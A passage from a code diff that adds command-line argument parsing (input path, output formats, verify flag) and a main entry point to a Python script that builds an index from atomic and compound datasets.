+        default=f"./{_SD_DATA}",
+        required=False,
+        help="Path to input folder holding atomic and compound datasets.",
+    )
+
+    parser.add_argument(
+        "--formats",
+        "-f",
+        default="all",
+        choices=get_args(OutputType),
+        required=False,
+        help="The type of output file(s) to create for the index.",
+    )
+    parser.add_argument(
+        "--verify",
+        "-v",
+        action="store_true",
+        help="Verify file(s) after writing.",
+    )
+    return parser
+
+
+if __name__ == "__main__":
+    arg_parser = _add_script_args()
+    args = arg_parser.parse_args()
+
+    main(
+        target_dir=args.output_path,
+        input_dir=args.input_path,
+        output=args.formats,
+        verify=args.verify,
+    )